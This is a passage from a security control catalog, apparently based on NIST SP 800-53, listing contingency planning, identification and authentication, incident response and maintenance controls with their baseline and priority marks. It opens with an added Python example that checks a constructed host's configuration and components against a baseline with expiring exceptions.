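CM-6 c) and d), CM-6(2), CM-6(3) and CM-8(3) together amount to one recurring check: compare what a host reports against the controlled baseline, treat a documented exception as compliance rather than drift, and hand everything else to an automated response and to incident tracking. The block below is an added illustration, not code from the RMAIP or from any DOE system, of that evaluation. Exceptions carry an expiry date so a lapsed approval is reported rather than silently honoured, unauthorized components are derived from the inventory, and each finding gets a stable identifier so repeated scans update one incident record instead of opening a new one. The baseline, the observation, the setting names and MAC addresses are all constructed for the example.

```python
"""Configuration and component drift check against a controlled baseline.

Added illustration (not RMAIP or DOE code). BASELINE and OBSERVED are
constructed data; setting names and addresses are hypothetical.
"""
import hashlib
from dataclasses import dataclass
from datetime import date

# Baseline for one host as it would be held under configuration control (CM-2).
# approved_exceptions are the CM-6 c) approvals; each carries an expiry date.
BASELINE = {
    "settings": {
        "sshd.PermitRootLogin": "no",
        "sshd.PasswordAuthentication": "no",
        "sysctl.net.ipv4.ip_forward": "0",
        "auditd.enabled": "yes",
    },
    "approved_exceptions": {
        "sysctl.net.ipv4.ip_forward": {"value": "1", "expires": "2030-12-31"},
        "auditd.enabled": {"value": "no", "expires": "2021-06-30"},  # lapsed
    },
    "authorized_components": {"00:11:22:33:44:01", "00:11:22:33:44:02"},
}

# Observation as a scanning agent would report it; constructed, not real data.
OBSERVED = {
    "settings": {
        "sshd.PermitRootLogin": "yes",      # unapproved, security-relevant change
        "sshd.PasswordAuthentication": "no",
        "sysctl.net.ipv4.ip_forward": "1",  # covered by a current exception
        "auditd.enabled": "no",             # its exception has expired
    },
    "components": {"00:11:22:33:44:01", "de:ad:be:ef:00:01"},
}


@dataclass(frozen=True)
class Finding:
    kind: str       # unauthorized_setting | expired_exception | unauthorized_component | missing_component
    item: str
    expected: str
    observed: str
    action: str     # the automated response (CM-6(2), CM-8(3) b)

    def ticket_id(self) -> str:
        # Stable per (kind, item, observed value) so repeated scans update one
        # incident record rather than opening a new one each run (CM-6(3)).
        return hashlib.sha256(f"{self.kind}|{self.item}|{self.observed}".encode()).hexdigest()[:12]


def assess(baseline: dict, observed: dict, today: date) -> list:
    findings = []
    for name, required in baseline["settings"].items():
        actual = observed["settings"].get(name, "<absent>")
        if actual == required:
            continue
        exc = baseline["approved_exceptions"].get(name)
        if exc and exc["value"] == actual:
            if date.fromisoformat(exc["expires"]) >= today:
                continue  # approved, documented and still valid: not drift
            findings.append(Finding("expired_exception", name, required, actual,
                                    "re-approve or reapply baseline; notify ISSO"))
            continue
        findings.append(Finding("unauthorized_setting", name, required, actual,
                                "reapply baseline value; open incident"))
    for mac in sorted(observed["components"] - baseline["authorized_components"]):
        findings.append(Finding("unauthorized_component", mac, "absent", "present",
                                "disable network access; notify ISSO"))
    for mac in sorted(baseline["authorized_components"] - observed["components"]):
        findings.append(Finding("missing_component", mac, "present", "absent",
                                "reconcile inventory"))
    return findings


def run_check(today_iso: str = "2024-05-01") -> list:
    """Evaluate the constructed host as of the given date."""
    return assess(BASELINE, OBSERVED, date.fromisoformat(today_iso))


if __name__ == "__main__":
    for f in run_check():
        print(f"[{f.ticket_id()}] {f.kind:22s} {f.item}: expected {f.expected}, "
              f"observed {f.observed} -> {f.action}")
```

The point of the expiry field is that an exception register with no end date turns into a permanent hole; the same scan run with a date before 30 June 2021 reports the auditd setting as compliant, and after it as a lapsed approval that needs re-review.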
CM-9 Configuration Management Plan X X X X X Yes Yes P1
The organization develops, documents, and implements a configuration management plan for the information system that: a) Addresses roles, responsibilities, and configuration management processes and procedures; b) Defines the configuration items for the information system and when in the system development life cycle the configuration items are placed under configuration management; and c) Establishes the means for identifying configuration items throughout the system development life cycle and a process for managing the configuration of the configuration items.
CP-1 Contingency Planning Policy And Procedures X X X X X X X X X X X X Yes Yes P1
The organization develops, disseminates, and reviews/updates [Assignment: organization-defined frequency]: a) A formal, documented contingency planning policy that addresses purpose, scope, roles, responsibilities, management commitment, coordination among organizational entities, and compliance; and b) Formal, documented procedures to facilitate the implementation of the contingency planning policy and associated contingency planning controls.
CP-2 Contingency Plan X X X X X X Yes Yes P1
The organization: a) Develops a contingency plan for the information system that: 1) Identifies essential missions and business functions and associated contingency requirements; 2) Provides recovery objectives, restoration priorities, and metrics; 3) Addresses contingency roles, responsibilities, assigned individuals with contact information; 4) Addresses maintaining essential missions and business functions despite an information system disruption, compromise, or failure; 5) Addresses eventual, full information system restoration without deterioration of the security measures originally planned and implemented; and 6) Is reviewed and approved by designated officials within the organization; b) Distributes copies of the contingency plan to [Assignment: organization-defined list of key contingency personnel (identified by name and/or by role) and organizational elements]; c) Coordinates contingency planning activities with incident handling activities; d) Reviews the contingency plan for the information system [Assignment: organization-defined frequency]; e) Revises the contingency plan to address changes to the organization, information system, or environment of operation and problems encountered during contingency plan implementation, execution, or testing; and f) Communicates contingency plan changes to [Assignment: organization-defined list of key contingency personnel (identified by name and/or by role) and organizational elements].
CP-2(1) Contingency Plan X X X X No Yes P1
The organization coordinates contingency plan development with organizational elements responsible for related plans.
CP-2(2) Contingency Plan X X X No Yes P1
The organization conducts capacity planning so that necessary capacity for information processing, telecommunications, and environmental support exists during contingency operations.
CP-2(3) Contingency Plan X X X No Yes P1
The organization plans for the resumption of essential missions and business functions within [Assignment: organization-defined time period] of contingency plan activation.
CP-2(4) Contingency Plan X X No Yes P1
The organization plans for the full resumption of missions and business functions within [Assignment: organization-defined time period] of contingency plan activation.
CP-2(5) Contingency Plan X No Yes P1
The organization plans for the continuance of essential missions and business functions with little or no loss of operational continuity and sustains that continuity until full information system restoration at primary processing and/or storage sites.
CP-2(6) Contingency Plan X No Yes P1
The organization provides for the transfer of all essential missions and business functions to alternate processing and/or storage sites with little or no loss of operational continuity and sustains that continuity through restoration to primary processing and/or storage sites.
CP-3 Contingency Training X X X X X X Yes Yes P2
The organization trains personnel in their contingency roles and responsibilities with respect to the information system and provides refresher training [Assignment: organization-defined frequency].
CP-3(1) Contingency Training X X No No P2
The organization incorporates simulated events into contingency training to facilitate effective response by personnel in crisis situations.
CP-4 Contingency Plan Testing And Exercises X X X X X X Yes Yes P2
The organization: a) Tests and/or exercises the contingency plan for the information system [Assignment: organization-defined frequency] using [Assignment: organization-defined tests and/or exercises] to determine the plan’s effectiveness and the organization’s readiness to execute the plan; and b) Reviews the contingency plan test/exercise results and initiates corrective actions.
CP-4(1) Contingency Plan Testing And Exercises X X X X Yes Yes P2
The organization coordinates contingency plan testing and/or exercises with organizational elements responsible for related plans.
CP-4(2) Contingency Plan Testing And Exercises X X No No P2
The organization tests/exercises the contingency plan at the alternate processing site to familiarize contingency personnel with the facility and available resources and to evaluate the site’s capabilities to support contingency operations.
CP-4(4) Contingency Plan Testing And Exercises X Yes Yes P2
The organization includes a full recovery and reconstitution of the information system to a known state as part of contingency plan testing.
CP-6 Alternate Storage Site X X X X No No P1
The organization establishes an alternate storage site including necessary agreements to permit the storage and recovery of information system backup information.
CP-6(1) Alternate Storage Site X X X X No No P1
The organization identifies an alternate storage site that is separated from the primary storage site so as not to be susceptible to the same hazards.
CP-6(2) Alternate Storage Site X X No No P1
The organization configures the alternate storage site to facilitate recovery operations in accordance with recovery time and recovery point objectives.
CP-6(3) Alternate Storage Site X X X X No No P1
The organization identifies potential accessibility problems to the alternate storage site in the event of an area-wide disruption or disaster and outlines explicit mitigation actions.
CP-7 Alternate Processing Site X X X X No No P1
The organization: a) Establishes an alternate processing site including necessary agreements to permit the resumption of information system operations for essential missions and business functions within [Assignment: organization-defined time period consistent with recovery time objectives] when the primary processing capabilities are unavailable; and b) Ensures that equipment and supplies required to resume operations are available at the alternate site or contracts are in place to support delivery to the site in time to support the organization-defined time period for resumption.
CP-7(1) Alternate Processing Site X X X X No No P1
The organization identifies an alternate processing site that is separated from the primary processing site so as not to be susceptible to the same hazards.
CP-7(2) Alternate Processing Site X X X X No No P1
The organization identifies potential accessibility problems to the alternate processing site in the event of an area-wide disruption or disaster and outlines explicit mitigation actions.
CP-7(3) Alternate Processing Site X X X X No No P1
The organization develops alternate processing site agreements that contain priority-of-service provisions in accordance with the organization’s availability requirements.
CP-7(4) Alternate Processing Site X X X No No P1
The organization configures the alternate processing site so that it is ready to be used as the operational site supporting essential missions and business functions.
CP-7(5) Alternate Processing Site X X X X X X X X No No P1
The organization ensures that the alternate processing site provides information security measures equivalent to that of the primary site.
CP-8 Telecommunications Services X X X X No No P1
The organization establishes alternate telecommunications services including necessary agreements to permit the resumption of information system operations for essential missions and business functions within [Assignment: organization-defined time period] when the primary telecommunications capabilities are unavailable.
CP-8(1) Telecommunications Services X X X X No No P1
The organization: a) Develops primary and alternate telecommunications service agreements that contain priority-of-service provisions in accordance with the organization’s availability requirements; and b) Requests Telecommunications Service Priority for all telecommunications services used for national security emergency preparedness in the event that the primary and/or alternate telecommunications services are provided by a common carrier.
CP-8(2) Telecommunications Services X X X X No No P1
The organization obtains alternate telecommunications services with consideration for reducing the likelihood of sharing a single point of failure with primary telecommunications services.
CP-8(3) Telecommunications Services X X No No P1
The organization obtains alternate telecommunications service providers that are separated from primary service providers so as not to be susceptible to the same hazards.
CP-8(4) Telecommunications Services X X No No P1
The organization requires primary and alternate telecommunications service providers to have contingency plans.
CP-9 Information System Backup | Baselines: X X X X X X X X X X X X | NSS Stand-Alone: Yes | NSS Network: Yes | Priority: P1
The organization: a) Conducts backups of user-level information contained in the information system [Assignment: organization-defined frequency consistent with recovery time and recovery point objectives]; b) Conducts backups of system-level information contained in the information system [Assignment: organization-defined frequency consistent with recovery time and recovery point objectives]; c) Conducts backups of information system documentation including security-related documentation [Assignment: organization-defined frequency consistent with recovery time and recovery point objectives]; and d) Protects the confidentiality and integrity of backup information at the storage location.

CP-9(1) Information System Backup | Baselines: X X X X X X X X | NSS Stand-Alone: No | NSS Network: Yes | Priority: P1
The organization tests backup information [Assignment: organization-defined frequency] to verify media reliability and information integrity.

CP-9(2) Information System Backup | Baselines: X X X | NSS Stand-Alone: No | NSS Network: Yes | Priority: P1
The organization uses a sample of backup information in the restoration of selected information system functions as part of contingency plan testing.

CP-9(3) Information System Backup | Baselines: X X | NSS Stand-Alone: No | NSS Network: Yes | Priority: P1
The organization stores backup copies of the operating system and other critical information system software, as well as copies of the information system inventory (including hardware, software, and firmware components) in a separate facility or in a fire-rated container that is not collocated with the operational system.

CP-9(4) Information System Backup | - - - - - - - - -
[Withdrawn: Incorporated into CP-9].
CP-9(5) Information System Backup | Baselines: X X | NSS Stand-Alone: No | NSS Network: Yes | Priority: P1
The organization transfers information system backup information to the alternate storage site [Assignment: organization-defined time period and transfer rate consistent with the recovery time and recovery point objectives].

CP-10 Information System Recovery And Reconstitution | Baselines: X X X X X X | NSS Stand-Alone: Yes | NSS Network: Yes | Priority: P1
The organization provides for the recovery and reconstitution of the information system to a known state after a disruption, compromise, or failure.

CP-10(1) Information System Recovery And Reconstitution | - - - - - - - - -
[Withdrawn: Incorporated into CP-4].

CP-10(2) Information System Recovery And Reconstitution | Baselines: X X X X X X X X | NSS Stand-Alone: No | NSS Network: No | Priority: P1
The information system implements transaction recovery for systems that are transaction-based.

CP-10(3) Information System Recovery And Reconstitution | Baselines: X X
The organization provides compensating security controls for [Assignment: organization-defined circumstances that can inhibit recovery and reconstitution to a known state].

CP-10(4) Information System Recovery And Reconstitution | Baselines: X | NSS Stand-Alone: No | NSS Network: Yes
The organization provides the capability to reimage information system components within [Assignment: organization-defined restoration time-periods] from configuration-controlled and integrity-protected disk images representing a secure, operational state for the components.

IA-1 Identification And Authentication Policy And Procedures | Baselines: X X X X X X X X X | NSS Stand-Alone: Yes | NSS Network: Yes | Priority: P1
The organization develops, disseminates, and reviews/updates [Assignment: organization-defined frequency]: a) A formal, documented identification and authentication policy that addresses purpose, scope, roles, responsibilities, management commitment, coordination among organizational entities, and compliance; and b) Formal, documented procedures to facilitate the implementation of the identification and authentication policy and associated identification and authentication controls.
IA-2 Identification And Authentication (Organizational Users) | Baselines: X X X X X X X X X | NSS Stand-Alone: Yes | NSS Network: Yes | Priority: P1
The information system uniquely identifies and authenticates organizational users (or processes acting on behalf of organizational users).

IA-2(1) Identification And Authentication (Organizational Users) | Baselines: X X X X X X X X X | NSS Stand-Alone: No | NSS Network: Yes | Priority: P1
The information system uses multifactor authentication for network access to privileged accounts.

IA-2(2) Identification And Authentication (Organizational Users) | Baselines: X X X X X X | NSS Stand-Alone: No | NSS Network: Yes | Priority: P1
The information system uses multifactor authentication for network access to non-privileged accounts.

IA-2(3) Identification And Authentication (Organizational Users) | Baselines: X X X X X X | NSS Stand-Alone: No | NSS Network: No | Priority: P1
The information system uses multifactor authentication for local access to privileged accounts.

IA-2(4) Identification And Authentication (Organizational Users) | Baselines: X X X X X | NSS Stand-Alone: No | NSS Network: No | Priority: P1
The information system uses multifactor authentication for local access to non-privileged accounts.

IA-2(5) Identification And Authentication (Organizational Users) | Baselines: X X X X X X | NSS Stand-Alone: Yes | NSS Network: Yes | Priority: P1
The organization: a) Allows the use of group authenticators only when used in conjunction with an individual/unique authenticator; and b) Requires individuals to be authenticated with an individual authenticator prior to using a group authenticator.

IA-2(8) Identification And Authentication (Organizational Users) | Baselines: X X X X X X X X | NSS Stand-Alone: No | NSS Network: No | Priority: P1
The information system uses [Assignment: organization-defined replay-resistant authentication mechanisms] for network access to privileged accounts.

IA-2(9) Identification And Authentication (Organizational Users) | Baselines: X X X X X | NSS Stand-Alone: No | NSS Network: No | Priority: P1
The information system uses [Assignment: organization-defined replay-resistant authentication mechanisms] for network access to non-privileged accounts.

IA-3 Device Identification And Authentication | Baselines: X X X X X X X X | NSS Stand-Alone: No | NSS Network: No | Priority: P1
The information system uniquely identifies and authenticates [Assignment: organization-defined list of specific and/or types of devices] before establishing a connection.

IA-3(1) Device Identification And Authentication | Baselines: X X X X X X | NSS Stand-Alone: No | NSS Network: Yes | Priority: P1
The information system authenticates devices before establishing remote and wireless network connections using bidirectional authentication between devices that is cryptographically based.
IA-3(2) Device Identification And Authentication | Baselines: X X X X X X | NSS Stand-Alone: No | NSS Network: Yes | Priority: P1
The information system authenticates devices before establishing network connections using bidirectional authentication between devices that is cryptographically based.

IA-3(3) Device Identification And Authentication | Baselines: X X X X X X | NSS Stand-Alone: No | NSS Network: Yes | Priority: P1
The organization standardizes, with regard to dynamic address allocation, Dynamic Host Control Protocol (DHCP) lease information and the time assigned to devices, and audits lease information when assigned to a device.

IA-4 Identifier Management | Baselines: X X X X X X X X X | NSS Stand-Alone: Yes | NSS Network: Yes | Priority: P1
The organization manages information system identifiers for users and devices by: a) Receiving authorization from a designated organizational official to assign a user or device identifier; b) Selecting an identifier that uniquely identifies an individual or device; c) Assigning the user identifier to the intended party or the device identifier to the intended device; d) Preventing reuse of user or device identifiers for [Assignment: organization-defined time period]; and e) Disabling the user identifier after [Assignment: organization-defined time period of inactivity].

IA-4(4) Identifier Management | Baselines: X X X X X X | NSS Stand-Alone: Yes | NSS Network: Yes | Priority: P1
The organization manages user identifiers by uniquely identifying the user as [Assignment: organization-defined characteristic identifying user status].
IA-5 Authenticator Management | Baselines: X X X X X X X X X | NSS Stand-Alone: Yes | NSS Network: Yes | Priority: P1
The organization manages information system authenticators for users and devices by: a) Verifying, as part of the initial authenticator distribution, the identity of the individual and/or device receiving the authenticator; b) Establishing initial authenticator content for authenticators defined by the organization; c) Ensuring that authenticators have sufficient strength of mechanism for their intended use; d) Establishing and implementing administrative procedures for initial authenticator distribution, for lost/compromised or damaged authenticators, and for revoking authenticators; e) Changing default content of authenticators upon information system installation; f) Establishing minimum and maximum lifetime restrictions and reuse conditions for authenticators (if appropriate); g) Changing/refreshing authenticators [Assignment: organization-defined time period by authenticator type]; h) Protecting authenticator content from unauthorized disclosure and modification; and i) Requiring users to take, and having devices implement, specific measures to safeguard authenticators.
IA-5(1) Authenticator Management | Baselines: X X X X X X X X X | NSS Stand-Alone: Yes | NSS Network: Yes | Priority: P1
The information system, for password-based authentication: a) Enforces minimum password complexity of [Assignment: organization-defined requirements for case sensitivity, number of characters, mix of upper-case letters, lower-case letters, numbers, and special characters, including minimum requirements for each type]; b) Enforces at least a [Assignment: organization-defined number of changed characters] when new passwords are created; c) Encrypts passwords in storage and in transmission; d) Enforces password minimum and maximum lifetime restrictions of [Assignment: organization-defined numbers for lifetime minimum, lifetime maximum]; and e) Prohibits password reuse for [Assignment: organization-defined number] generations.

IA-5(2) Authenticator Management | Baselines: X X X X X | NSS Stand-Alone: No | NSS Network: Yes | Priority: P1
The information system, for PKI-based authentication: a) Validates certificates by constructing a certification path with status information to an accepted trust anchor; b) Enforces authorized access to the corresponding private key; and c) Maps the authenticated identity to the user account.

IA-5(3) Authenticator Management | Baselines: X X X X X | NSS Stand-Alone: Yes | NSS Network: Yes | Priority: P1
The organization requires that the registration process to receive [Assignment: organization-defined types of and/or specific authenticators] be carried out in person before a designated registration authority with authorization by a designated organizational official (e.g., a supervisor).

IA-5(4) Authenticator Management | Baselines: X X X X X X | NSS Stand-Alone: No | NSS Network: Yes | Priority: P1
The organization employs automated tools to determine if authenticators are sufficiently strong to resist attacks intended to discover or otherwise compromise the authenticators.
IA-5(6) Authenticator Management | Baselines: X X X X X X
The organization protects authenticators commensurate with the classification or sensitivity of the information accessed.

IA-5(7) Authenticator Management | Baselines: X X X | NSS Stand-Alone: No | NSS Network: Yes | Priority: P2
The organization ensures that unencrypted static authenticators are not embedded in applications or access scripts or stored on function keys.

IA-5(8) Authenticator Management | Baselines: X X X X X X | NSS Stand-Alone: Yes | NSS Network: Yes | Priority: P2
The organization takes [Assignment: organization-defined measures] to manage the risk of compromise due to individuals having accounts on multiple information systems.

IA-6 Authenticator Feedback | Baselines: X X X X X X | NSS Stand-Alone: Yes | NSS Network: Yes | Priority: P1
The information system obscures feedback of authentication information during the authentication process to protect the information from possible exploitation/use by unauthorized individuals.

IA-7 Cryptographic Module Authentication | Baselines: X X X X X X X X X | NSS Stand-Alone: No | NSS Network: No | Priority: P1
The information system uses mechanisms for authentication to a cryptographic module that meet the requirements of applicable federal laws, Executive Orders, directives, policies, regulations, standards, and guidance for such authentication.

IA-8 Identification And Authentication (Non-Organizational Users) | Baselines: X X X X X X X X X | NSS Stand-Alone: No | NSS Network: No | Priority: P1
The information system uniquely identifies and authenticates non-organizational users (or processes acting on behalf of non-organizational users).

IR-1 Incident Response Policy And Procedures | Baselines: X X X X X X X X X X X X | NSS Stand-Alone: Yes | NSS Network: Yes | Priority: P1
The organization develops, disseminates, and reviews/updates [Assignment: organization-defined frequency]: a) A formal, documented incident response policy that addresses purpose, scope, roles, responsibilities, management commitment, coordination among organizational entities, and compliance; and b) Formal, documented procedures to facilitate the implementation of the incident response policy and associated incident response controls.
IR-2 Incident Response Training | Baselines: X X X X X X X X X X X X | NSS Stand-Alone: Yes | NSS Network: Yes | Priority: P2
The organization: a) Trains personnel in their incident response roles and responsibilities with respect to the information system; and b) Provides refresher training [Assignment: organization-defined frequency].

IR-2(1) Incident Response Training | Baselines: X X X X | NSS Stand-Alone: Yes | NSS Network: Yes | Priority: P2
The organization incorporates simulated events into incident response training to facilitate effective response by personnel in crisis situations.

IR-2(2) Incident Response Training | Baselines: X X X | NSS Stand-Alone: No | NSS Network: No | Priority: P2
The organization employs automated mechanisms to provide a more thorough and realistic training environment.

IR-3 Incident Response Testing And Exercises | Baselines: X X X X X X X X X X X | NSS Stand-Alone: Yes | NSS Network: Yes | Priority: P2
The organization tests and/or exercises the incident response capability for the information system [Assignment: organization-defined frequency] using [Assignment: organization-defined tests and/or exercises] to determine the incident response effectiveness and documents the results.

IR-3(1) Incident Response Testing And Exercises | Baselines: X | NSS Stand-Alone: No | NSS Network: No | Priority: P2
The organization employs automated mechanisms to more thoroughly and effectively test/exercise the incident response capability.

IR-4 Incident Handling | Baselines: X X X X X X X X X X X X | NSS Stand-Alone: Yes | NSS Network: Yes | Priority: P1
The organization: a) Implements an incident handling capability for security incidents that includes preparation, detection and analysis, containment, eradication, and recovery; b) Coordinates incident handling activities with contingency planning activities; and c) Incorporates lessons learned from ongoing incident handling activities into incident response procedures, training, and testing/exercises, and implements the resulting changes accordingly.

IR-4(1) Incident Handling | Baselines: X X X X X X X X X X X | NSS Stand-Alone: No | NSS Network: No | Priority: P1
The organization employs automated mechanisms to support the incident handling process.
IR-4(3) Incident Handling | Baselines: X X X X X X X X X | NSS Stand-Alone: Yes | NSS Network: Yes | Priority: P1
The organization identifies classes of incidents and defines appropriate actions to take in response to ensure continuation of organizational missions and business functions.

IR-4(4) Incident Handling | Baselines: X X X X X X X X X | NSS Stand-Alone: Yes | NSS Network: Yes | Priority: P1
The organization correlates incident information and individual incident responses to achieve an organization-wide perspective on incident awareness and response.

IR-5 Incident Monitoring | Baselines: X X X X X X X X X X X X | NSS Stand-Alone: Yes | NSS Network: Yes | Priority: P1
The organization tracks and documents information system security incidents.

IR-5(1) Incident Monitoring | Baselines: X X X | NSS Stand-Alone: No | NSS Network: No | Priority: P1
The organization employs automated mechanisms to assist in the tracking of security incidents and in the collection and analysis of incident information.

IR-6 Incident Reporting | Baselines: X X X X X X X X X X X X | NSS Stand-Alone: Yes | NSS Network: Yes | Priority: P1
The organization: a) Requires personnel to report suspected security incidents to the organizational incident response capability within [Assignment: organization-defined time-period]; and b) Reports security incident information to designated authorities.

IR-6(1) Incident Reporting | Baselines: X X X X X X X X X X X | NSS Stand-Alone: Yes | NSS Network: Yes | Priority: P1
The organization employs automated mechanisms to assist in the reporting of security incidents.

IR-6(2) Incident Reporting | Baselines: X X X X X X X X X | NSS Stand-Alone: Yes | NSS Network: Yes | Priority: P1
The organization reports information system weaknesses, deficiencies, and/or vulnerabilities associated with reported security incidents to appropriate organizational officials.

IR-7 Incident Response Assistance | Baselines: X X X X X X X X X X X X | NSS Stand-Alone: Yes | NSS Network: Yes | Priority: P3
The organization provides an incident response support resource, integral to the organizational incident response capability that offers advice and assistance to users of the information system for the handling and reporting of security incidents.

IR-7(1) Incident Response Assistance | Baselines: X X X X X X X X X X X | NSS Stand-Alone: No | NSS Network: No | Priority: P3
The organization employs automated mechanisms to increase the availability of incident response-related information and support.
IR-7(2) Incident Response Assistance | Baselines: X X X X X X X X X | NSS Stand-Alone: Yes | NSS Network: Yes | Priority: P3
The organization: a) Establishes a direct, cooperative relationship between its incident response capability and external providers of information system protection capability; and b) Identifies organizational incident response team members to the external providers.
IR-8 Incident Response Plan | Baselines: X X X X X X X X X X X X | NSS Stand-Alone: Yes | NSS Network: Yes | Priority: P1
The organization: a) Develops an incident response plan that: 1) Provides the organization with a roadmap for implementing its incident response capability; 2) Describes the structure and organization of the incident response capability; 3) Provides a high-level approach for how the incident response capability fits into the overall organization; 4) Meets the unique requirements of the organization, which relate to mission, size, structure, and functions; 5) Defines reportable incidents; 6) Provides metrics for measuring the incident response capability within the organization; 7) Defines the resources and management support needed to effectively maintain and mature an incident response capability; and 8) Is reviewed and approved by designated officials within the organization; b) Distributes copies of the incident response plan to [Assignment: organization-defined list of incident response personnel (identified by name and/or by role) and organizational elements]; c) Reviews the incident response plan [Assignment: organization-defined frequency]; d) Revises the incident response plan to address system/organizational changes or problems encountered during plan implementation, execution, or testing; and e) Communicates incident response plan changes to [Assignment: organization-defined list of incident response personnel (identified by name and/or by role) and organizational elements].
MA-1 System Maintenance Policy And Procedures | Baselines: X X X X X X X X X X X X | NSS Stand-Alone: Yes | NSS Network: Yes | Priority: P1
The organization develops, disseminates, and reviews/updates [Assignment: organization-defined frequency]: a) A formal, documented information system maintenance policy that addresses purpose, scope, roles, responsibilities, management commitment, coordination among organizational entities, and compliance; and b) Formal, documented procedures to facilitate the implementation of the information system maintenance policy and associated system maintenance controls.

MA-2 Controlled Maintenance | Baselines: X X X X X X X X X X X X | NSS Stand-Alone: Yes | NSS Network: Yes | Priority: P2
The organization: a) Schedules, performs, documents, and reviews records of maintenance and repairs on information system components in accordance with manufacturer or vendor specifications and/or organizational requirements; b) Controls all maintenance activities, whether performed on site or remotely and whether the equipment is serviced on site or removed to another location; c) Requires that a designated official explicitly approve the removal of the information system or system components from organizational facilities for off-site maintenance or repairs; d) Sanitizes equipment to remove all information from associated media prior to removal from organizational facilities for off-site maintenance or repairs; and e) Checks all potentially impacted security controls to verify that the controls are still functioning properly following maintenance or repair actions.
MA-2(1) Controlled Maintenance | Baselines: X X X X X X X X X X X | NSS Stand-Alone: Yes | NSS Network: Yes | Priority: P2
The organization maintains maintenance records for the information system that include: a) Date and time of maintenance; b) Name of the individual performing the maintenance; c) Name of escort, if necessary; d) A description of the maintenance performed; and e) A list of equipment removed or replaced (including identification numbers, if applicable).

MA-2(2) Controlled Maintenance | Baselines: X X X | NSS Stand-Alone: No | NSS Network: No | Priority: P2
The organization employs automated mechanisms to schedule, conduct, and document maintenance and repairs as required, producing up-to-date, accurate, complete, and available records of all maintenance and repair actions, needed, in process, and completed.

MA-3 Maintenance Tools | Baselines: X X X X X X X X | NSS Stand-Alone: Yes | NSS Network: Yes | Priority: P2
The organization approves, controls, monitors the use of, and maintains on an ongoing basis, information system maintenance tools.

MA-3(1) Maintenance Tools | Baselines: X X X X X X | NSS Stand-Alone: Yes | NSS Network: Yes | Priority: P2
The organization inspects all maintenance tools carried into a facility by maintenance personnel for obvious improper modifications.

MA-3(2) Maintenance Tools | Baselines: X X X X X X X X | NSS Stand-Alone: Yes | NSS Network: Yes | Priority: P2
The organization checks all media containing diagnostic and test programs for malicious code before the media are used in the information system.

MA-3(3) Maintenance Tools | Baselines: X X X X | NSS Stand-Alone: Yes | NSS Network: Yes | Priority: P2
The organization prevents the unauthorized removal of maintenance equipment by one of the following: (i) verifying that there is no organizational information contained on the equipment; (ii) sanitizing or destroying the equipment; (iii) retaining the equipment within the facility; or (iv) obtaining an exemption from a designated organization official explicitly authorizing removal of the equipment from the facility.
MA-4 Non-Local Maintenance | Baselines: X X X X X X | NSS Stand-Alone: No | NSS Network: No | Priority: P1
The organization: a) Authorizes, monitors, and controls non-local maintenance and diagnostic activities; b) Allows the use of non-local maintenance and diagnostic tools only as consistent with organizational policy and documented in the security plan for the information system; c) Employs strong identification and authentication techniques in the establishment of non-local maintenance and diagnostic sessions; d) Maintains records for non-local maintenance and diagnostic activities; and e) Terminates all sessions and network connections when non-local maintenance is completed.

MA-4(1) Non-Local Maintenance | Baselines: X X
The organization audits non-local maintenance and diagnostic sessions and designated organizational personnel review the maintenance records of the sessions.

MA-4(2) Non-Local Maintenance | Baselines: X X X X X | NSS Stand-Alone: No | NSS Network: No | Priority: P1
The organization documents, in the security plan for the information system, the installation and use of non-local maintenance and diagnostic connections.
MA-4(3) Non-Local Maintenance | Baselines: X X X X X X X X X X | NSS Stand-Alone: No | NSS Network: No | Priority: P1
The organization: a) Requires that non-local maintenance and diagnostic services be performed from an information system that implements a level of security at least as high as that implemented on the system being serviced; or b) Removes the component to be serviced from the information system and prior to non-local maintenance or diagnostic services, sanitizes the component (with regard to organizational information) before removal from organizational facilities, and after the service is performed, inspects and sanitizes the component (with regard to potentially malicious software and surreptitious implants) before reconnecting the component to the information system.

MA-4(5) Non-Local Maintenance | Baselines: X X X | NSS Stand-Alone: No | NSS Network: No | Priority: P1
The organization requires that: a) Maintenance personnel notify [Assignment: organization-defined personnel] when non-local maintenance is planned (i.e., date/time); and b) A designated organizational official with specific information security/information system knowledge approves the non-local maintenance.

MA-4(6) Non-Local Maintenance | Baselines: X X X X X X | NSS Stand-Alone: No | NSS Network: No | Priority: P1
The organization employs cryptographic mechanisms to protect the integrity and confidentiality of non-local maintenance and diagnostic communications.

MA-4(7) Non-Local Maintenance | Baselines: X X X | NSS Stand-Alone: No | NSS Network: No | Priority: P1
The organization employs remote disconnect verification at the termination of non-local maintenance and diagnostic sessions.
MA-5 Maintenance Personnel | Baselines: X X X X X X X X X X X X | NSS Stand-Alone: Yes | NSS Network: Yes | Priority: P1
The organization: a) Establishes a process for maintenance personnel authorization and maintains a current list of authorized maintenance organizations or personnel; and b) Ensures that personnel performing maintenance on the information system have required access authorizations or designates organizational personnel with required access authorizations and technical competence deemed necessary to supervise information system maintenance when maintenance personnel do not possess the required access authorizations.

MA-5(1) Maintenance Personnel | Baselines: X X X X X X X X X | NSS Stand-Alone: Yes | NSS Network: Yes | Priority: P1
The organization maintains procedures for the use of maintenance personnel that lack appropriate security clearances or are not U.S. citizens, that include the following requirements: a) Maintenance personnel who do not have needed access authorizations, clearances, or formal access approvals are escorted and supervised during the performance of maintenance and diagnostic activities on the information system by approved organizational personnel who are fully cleared, have appropriate access authorizations, and are technically qualified; b) Prior to initiating maintenance or diagnostic activities by personnel who do not have needed access authorizations, clearances or formal access approvals, all volatile information storage components within the information system are sanitized and all nonvolatile storage media are removed or physically disconnected from the system and secured; and c) In the event an information system component cannot be sanitized, the procedures contained in the security plan for the system are enforced.
MA-5(2) Maintenance Personnel | NSS Stand-Alone: Yes | NSS Network: Yes
The organization ensures that personnel performing maintenance and diagnostic activities on an information system processing, storing, or transmitting classified information are cleared (i.e., possess appropriate security clearances) for the highest level of information on the system.

MA-5(3) Maintenance Personnel | NSS Stand-Alone: Yes | NSS Network: Yes
The organization ensures that personnel performing maintenance and diagnostic activities on an information system processing, storing, or transmitting classified information are U.S. citizens.

MA-6 Timely Maintenance | Baselines: X X X X | NSS Stand-Alone: Yes | NSS Network: Yes | Priority: P1
The organization obtains maintenance support and/or spare parts for [Assignment: organization-defined list of security-critical information system components and/or key information technology components] within [Assignment: organization-defined time period] of failure.

MP-1 Media Protection Policy And Procedures | Baselines: X X X X X X X X X X X X | NSS Stand-Alone: Yes | NSS Network: Yes | Priority: P1
